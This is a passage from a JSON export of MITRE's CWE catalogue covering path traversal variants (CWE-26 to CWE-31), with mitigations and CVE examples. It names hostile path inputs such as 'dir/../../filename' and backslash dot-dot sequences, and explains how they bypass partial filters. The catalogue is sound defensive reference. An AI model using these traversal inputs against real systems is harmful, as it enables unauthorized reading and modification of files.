checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'/directory/../filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Directory Dot Dot Slash - \'/directory/../filename\'","attr":{"@_Date":"2008-04-11"}}}},"27":{"attr":{"@_ID":"27","@_Name":"Path Traversal: \'dir/../../filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal \\"../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'directory/../../filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one \\"../\\" sequence, so multiple \\"../\\" can bypass that check. Alternately, this manipulation could be used to bypass a check for \\"../\\" at the beginning of the pathname, moving up more than one directory level."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0298","Description":"Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several \\"/../\\" sequences, or several \\"../\\" in a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'directory/../../filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Directory Doubled Dot Dot Slash - \'directory/../../filename\'","attr":{"@_Date":"2008-04-11"}}}},"28":{"attr":{"@_ID":"28","@_Name":"Path Traversal: \'..\\\\filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"..\\\\\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'..\\\\\' manipulation is the canonical manipulation for operating systems that use \\"\\\\\\" as directory separators, such as Windows. However, it is also useful for bypassing path traversal protection schemes that only assume that the \\"/\\" separator is valid."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"},{"Reference":"CVE-2002-0946","Description":"Arbitrary files may be read files via ..\\\\ (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946"},{"Reference":"CVE-2002-1042","Description":"Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042"},{"Reference":"CVE-2002-1209","Description":"Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in a GET request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209"},{"Reference":"CVE-2002-1178","Description":"Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via \\"..\\\\\\" sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'..\\\\filename\' (\'dot dot backslash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - Dot Dot Backslash - \'..\\\\filename\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Traversal: \'..\\\\filename\'","attr":{"@_Date":"2008-10-14"}}]}},"29":{"attr":{"@_ID":"29","@_Name":"Path Traversal: \'\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'\\\\..\\\\filename\' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","This is similar to CWE-25, except using \\"\\\\\\" instead of \\"/\\". Sometimes a program checks for \\"..\\\\\\" at the beginning of the input, so a \\"\\\\..\\\\\\" can bypass that check. It is also useful for bypassing path traversal protection schemes that only assume that the \\"/\\" separator is valid."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"},{"Reference":"CVE-2005-2142","Description":"Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a \\"\\\\..\\" sequence in an LS command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'\\\\..\\\\filename\' (\'leading dot dot backslash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Dot Dot Backslash - \'\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}}}},"30":{"attr":{"@_ID":"30","@_Name":"Path Traversal: \'\\\\dir\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'\\\\dir\\\\..\\\\filename\' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","This is similar to CWE-26, except using \\"\\\\\\" instead of \\"/\\". The \'\\\\dir\\\\..\\\\filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for \\"..\\\\\\" at the beginning of the input, so a \\"\\\\..\\\\\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"7 - \'\\\\directory\\\\..\\\\filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Directory Dot Dot Backslash - \'\\\\directory\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}}}},"31":{"attr":{"@_ID":"31","@_Name":"Path Traversal: \'dir\\\\..\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'dir\\\\..\\\\..\\\\filename\' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'dir\\\\..\\\\..\\\\filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one \\"..\\\\\\" sequence, so multiple \\"..\\\\\\" can bypass that check. Alternately, this manipulation could be used to bypass a check for \\"..\\\\\\" at the beginning of the pathname, moving up more than one directory level."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0160","Description":"The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a \\"..\\\\..\\" sequence in the URL to port 2002.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"8 - \'directory\\\\..\\\\..\\\\filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path 